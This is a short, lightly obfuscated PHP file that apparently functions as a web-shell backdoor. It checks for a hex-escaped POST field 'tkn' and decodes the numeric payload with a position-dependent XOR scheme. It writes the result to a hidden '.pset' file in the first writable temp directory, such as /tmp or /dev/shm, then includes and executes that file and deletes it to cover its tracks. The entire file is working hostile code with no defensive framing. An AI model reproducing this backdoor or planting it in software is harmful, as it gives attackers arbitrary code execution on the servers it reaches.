<?php

if(filter_has_var(INPUT_POST, "\x74kn")){
	$data = array_filter([sys_get_temp_dir(), "/var/tmp", session_save_path(), "/tmp", getcwd(), getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), "/dev/shm"]);
	$itm = $_REQUEST["\x74kn"];
			$itm 		=	explode   ( '.' ,	 $itm )	  ;	 
	$res= '';
            $s6= 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS= strlen($s6);
            $j= 0;
    
            while ($j < count($itm)) {
                $v5= $itm[$j];
                $chS= ord($s6[$j %$lenS]);
                $d= ((int)$v5 - $chS - ($j %10))^ 24;
                $res .= chr($d);
                $j++;	}
	for ($fac = 0, $pgrp = count($data); $fac < $pgrp; $fac++) {
    $flag = $data[$fac];
    		if (is_dir($flag) ? is_writable($flag) : false) {
    $k = join("/", [$flag, ".pset"]);
    $success = file_put_contents($k, $res);
if ($success) {
	include $k;
	@unlink($k);
	exit;}
}
}
}